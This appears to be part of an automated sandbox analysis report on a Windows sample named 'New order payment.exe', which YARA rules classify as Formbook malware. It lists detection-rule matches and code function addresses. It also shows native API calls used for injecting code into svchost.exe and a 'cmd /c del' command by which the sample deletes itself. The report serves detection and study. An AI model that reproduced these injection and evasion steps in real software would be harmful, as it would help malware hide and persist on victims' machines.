          Source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030FB
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_004047D30_2_004047D3
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_004061D40_2_004061D4
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_732230700_2_73223070
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_732230BA0_2_732230BA
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041D0F51_2_0041D0F5
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041C0FC1_2_0041C0FC
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041B8B61_2_0041B8B6
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041C9851_2_0041C985
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041C3AF1_2_0041C3AF
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00408C6B1_2_00408C6B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00408C701_2_00408C70
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041BD451_2_0041BD45
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041A6B61_2_0041A6B6
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099B0901_2_0099B090
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A520A81_2_00A520A8
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B20A01_2_009B20A0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A528EC1_2_00A528EC
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A5E8241_2_00A5E824
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A410021_2_00A41002
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA8301_2_009AA830
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF1_2_009A99BF
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098F9001_2_0098F900
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A41201_2_009A4120
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A522AE1_2_00A522AE
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A3FA2B1_2_00A3FA2B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BEBB01_2_009BEBB0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BABD81_2_009BABD8
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4DBD21_2_00A4DBD2
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A403DA1_2_00A403DA
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A52B281_2_00A52B28
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA3091_2_009AA309
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AAB401_2_009AAB40
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099841F1_2_0099841F
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4D4661_2_00A4D466
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B25811_2_009B2581
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A525DD1_2_00A525DD
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099D5E01_2_0099D5E0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A52D071_2_00A52D07
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00980D201_2_00980D20
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A51D551_2_00A51D55
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A52EF71_2_00A52EF7
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A6E301_2_009A6E30
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4D6161_2_00A4D616
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A51FF11_2_00A51FF1
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A5DFCE1_2_00A5DFCE
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_004010301_1_00401030
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041D0F51_1_0041D0F5
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041C0FC1_1_0041C0FC
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041B8B61_1_0041B8B6
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041C9851_1_0041C985
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041C3AF1_1_0041C3AF
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_00408C6B1_1_00408C6B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_00408C701_1_00408C70
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041BD451_1_0041BD45
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_00402D901_1_00402D90
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041A6B61_1_0041A6B6
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_00402FB01_1_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0385EBB014_2_0385EBB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E03DA14_2_038E03DA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038EDBD214_2_038EDBD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0385ABD814_2_0385ABD8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038D23E314_2_038D23E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A30914_2_0384A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F2B2814_2_038F2B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384AB4014_2_0384AB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F22AE14_2_038F22AE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF14_2_038E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038DFA2B14_2_038DFA2B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF14_2_038499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382F90014_2_0382F900
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384412014_2_03844120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0383B09014_2_0383B090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038520A014_2_038520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F20A814_2_038F20A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F28EC14_2_038F28EC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E100214_2_038E1002
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038FE82414_2_038FE824
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A83014_2_0384A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038FDFCE14_2_038FDFCE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F1FF114_2_038F1FF1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F2EF714_2_038F2EF7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038ED61614_2_038ED616
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03846E3014_2_03846E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0385258114_2_03852581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F25DD14_2_038F25DD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0383D5E014_2_0383D5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F2D0714_2_038F2D07
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03820D2014_2_03820D20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F1D5514_2_038F1D55
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0383841F14_2_0383841F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038ED46614_2_038ED466
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DAD0F514_2_02DAD0F5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DAB8B614_2_02DAB8B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DAC98514_2_02DAC985
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DAA6B614_2_02DAA6B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02D92FB014_2_02D92FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02D98C7014_2_02D98C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02D98C6B14_2_02D98C6B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02D92D9014_2_02D92D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DABD4514_2_02DABD45
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0382B150 appears 107 times
          Source: C:\Users\user\Desktop\New order payment.exeCode function: String function: 0098B150 appears 87 times
          Source: C:\Users\user\Desktop\New order payment.exeCode function: String function: 0041A380 appears 38 times
          Source: C:\Users\user\Desktop\New order payment.exeCode function: String function: 0041A4B0 appears 38 times
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_004185D0 NtCreateFile,1_2_004185D0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00418680 NtReadFile,1_2_00418680
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00418700 NtClose,1_2_00418700
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_004187B0 NtAllocateVirtualMemory,1_2_004187B0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_004185CA NtCreateFile,1_2_004185CA
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041867A NtReadFile,1_2_0041867A
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_004186FB NtClose,1_2_004186FB
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_009C98F0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9840 NtDelayExecution,LdrInitializeThunk,1_2_009C9840
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_009C9860
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C99A0 NtCreateSection,LdrInitializeThunk,1_2_009C99A0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_009C9910
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_009C9A00
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9A20 NtResumeThread,LdrInitializeThunk,1_2_009C9A20
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9A50 NtCreateFile,LdrInitializeThunk,1_2_009C9A50
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C95D0 NtClose,LdrInitializeThunk,1_2_009C95D0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9540 NtReadFile,LdrInitializeThunk,1_2_009C9540
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_009C96E0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_009C9660
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9780 NtMapViewOfSection,LdrInitializeThunk,1_2_009C9780
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_009C97A0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9FE0 NtCreateMutant,LdrInitializeThunk,1_2_009C9FE0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9710 NtQueryInformationToken,LdrInitializeThunk,1_2_009C9710
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C98A0 NtWriteVirtualMemory,1_2_009C98A0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9820 NtEnumerateKey,1_2_009C9820
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009CB040 NtSuspendThread,1_2_009CB040
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C99D0 NtCreateProcessEx,1_2_009C99D0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9950 NtQueueApcThread,1_2_009C9950
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9A80 NtOpenDirectoryObject,1_2_009C9A80
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9A10 NtQuerySection,1_2_009C9A10
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009CA3B0 NtGetContextThread,1_2_009CA3B0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9B00 NtSetValueKey,1_2_009C9B00
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C95F0 NtQueryInformationFile,1_2_009C95F0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009CAD30 NtSetContextThread,1_2_009CAD30
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9520 NtWaitForSingleObject,1_2_009C9520
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9560 NtWriteFile,1_2_009C9560
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C96D0 NtCreateKey,1_2_009C96D0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9610 NtEnumerateValueKey,1_2_009C9610
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9650 NtQueryValueKey,1_2_009C9650
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9670 NtQueryInformationProcess,1_2_009C9670
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009CA710 NtOpenProcessToken,1_2_009CA710
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9730 NtQueryVirtualMemory,1_2_009C9730
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9770 NtSetInformationFile,1_2_009C9770
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009CA770 NtOpenThread,1_2_009CA770
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C9760 NtOpenProcess,1_2_009C9760
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_004185D0 NtCreateFile,1_1_004185D0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_00418680 NtReadFile,1_1_00418680
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_00418700 NtClose,1_1_00418700
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_004187B0 NtAllocateVirtualMemory,1_1_004187B0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_004185CA NtCreateFile,1_1_004185CA
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041867A NtReadFile,1_1_0041867A
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_004186FB NtClose,1_1_004186FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869A50 NtCreateFile,LdrInitializeThunk,14_2_03869A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038699A0 NtCreateSection,LdrInitializeThunk,14_2_038699A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869910 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_03869910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869840 NtDelayExecution,LdrInitializeThunk,14_2_03869840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869860 NtQuerySystemInformation,LdrInitializeThunk,14_2_03869860
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869780 NtMapViewOfSection,LdrInitializeThunk,14_2_03869780
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869FE0 NtCreateMutant,LdrInitializeThunk,14_2_03869FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869710 NtQueryInformationToken,LdrInitializeThunk,14_2_03869710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038696D0 NtCreateKey,LdrInitializeThunk,14_2_038696D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038696E0 NtFreeVirtualMemory,LdrInitializeThunk,14_2_038696E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869650 NtQueryValueKey,LdrInitializeThunk,14_2_03869650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869660 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_03869660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038695D0 NtClose,LdrInitializeThunk,14_2_038695D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869540 NtReadFile,LdrInitializeThunk,14_2_03869540
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0386A3B0 NtGetContextThread,14_2_0386A3B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869B00 NtSetValueKey,14_2_03869B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869A80 NtOpenDirectoryObject,14_2_03869A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869A00 NtProtectVirtualMemory,14_2_03869A00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869A10 NtQuerySection,14_2_03869A10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869A20 NtResumeThread,14_2_03869A20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038699D0 NtCreateProcessEx,14_2_038699D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869950 NtQueueApcThread,14_2_03869950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038698A0 NtWriteVirtualMemory,14_2_038698A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038698F0 NtReadVirtualMemory,14_2_038698F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869820 NtEnumerateKey,14_2_03869820
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0386B040 NtSuspendThread,14_2_0386B040
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038697A0 NtUnmapViewOfSection,14_2_038697A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0386A710 NtOpenProcessToken,14_2_0386A710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869730 NtQueryVirtualMemory,14_2_03869730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869760 NtOpenProcess,14_2_03869760
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0386A770 NtOpenThread,14_2_0386A770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869770 NtSetInformationFile,14_2_03869770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869610 NtEnumerateValueKey,14_2_03869610
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869670 NtQueryInformationProcess,14_2_03869670
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038695F0 NtQueryInformationFile,14_2_038695F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869520 NtWaitForSingleObject,14_2_03869520
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0386AD30 NtSetContextThread,14_2_0386AD30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03869560 NtWriteFile,14_2_03869560
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DA8680 NtReadFile,14_2_02DA8680
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DA87B0 NtAllocateVirtualMemory,14_2_02DA87B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DA8700 NtClose,14_2_02DA8700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DA85D0 NtCreateFile,14_2_02DA85D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DA86FB NtClose,14_2_02DA86FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DA867A NtReadFile,14_2_02DA867A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DA85CA NtCreateFile,14_2_02DA85CA
          Source: New order payment.exe, 00000000.00000003.238846897.000000000F176000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New order payment.exe
          Source: New order payment.exe, 00000001.00000002.301292454.00000000026EB000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamesvchost.exej% vs New order payment.exe
          Source: New order payment.exe, 00000001.00000003.244188608.0000000000746000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New order payment.exe
          Source: C:\Users\user\Desktop\New order payment.exeFile read: C:\Users\user\Desktop\New order payment.exeJump to behavior
          Source: New order payment.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\New order payment.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\New order payment.exe 'C:\Users\user\Desktop\New order payment.exe'
          Source: C:\Users\user\Desktop\New order payment.exeProcess created: C:\Users\user\Desktop\New order payment.exe 'C:\Users\user\Desktop\New order payment.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\New order payment.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\New order payment.exeProcess created: C:\Users\user\Desktop\New order payment.exe 'C:\Users\user\Desktop\New order payment.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\New order payment.exe'Jump to behavior
          Source: C:\Users\user\Desktop\New order payment.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\New order payment.exeFile created: C:\Users\user\AppData\Local\Temp\nseE55E.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@13/7
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,0_2_00402053
          Source: C:\Users\user\Desktop\New order payment.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404292
          Source: New order payment.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: wntdll.pdbUGP source: New order payment.exe, 00000000.00000003.242757682.000000000F1F0000.00000004.00000001.sdmp, New order payment.exe, 00000001.00000003.244051355.0000000000630000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.503827179.000000000391F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: New order payment.exe, svchost.exe
          Source: Binary string: svchost.pdb source: New order payment.exe, 00000001.00000002.301223099.00000000026E0000.00000040.00020000.sdmp
          Source: Binary string: svchost.pdbUGP source: New order payment.exe, 00000001.00000002.301223099.00000000026E0000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041B87C push eax; ret 1_2_0041B882
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041B812 push eax; ret 1_2_0041B818
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041B81B push eax; ret 1_2_0041B882
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041C951 push FFFFFFA3h; ret 1_2_0041C955
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00404F18 push edi; retf 1_2_00404F19
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0041B7C5 push eax; ret 1_2_0041B818
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009DD0D1 push ecx; ret 1_2_009DD0E4
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041B87C push eax; ret 1_1_0041B882
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041B812 push eax; ret 1_1_0041B818
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041B81B push eax; ret 1_1_0041B882
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041C951 push FFFFFFA3h; ret 1_1_0041C955
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_00404F18 push edi; retf 1_1_00404F19
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_1_0041B7C5 push eax; ret 1_1_0041B818
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0387D0D1 push ecx; ret 14_2_0387D0E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DAB87C push eax; ret 14_2_02DAB882
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DAB81B push eax; ret 14_2_02DAB882
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DAB812 push eax; ret 14_2_02DAB818
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DAC951 push FFFFFFA3h; ret 14_2_02DAC955
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02DAB7C5 push eax; ret 14_2_02DAB818
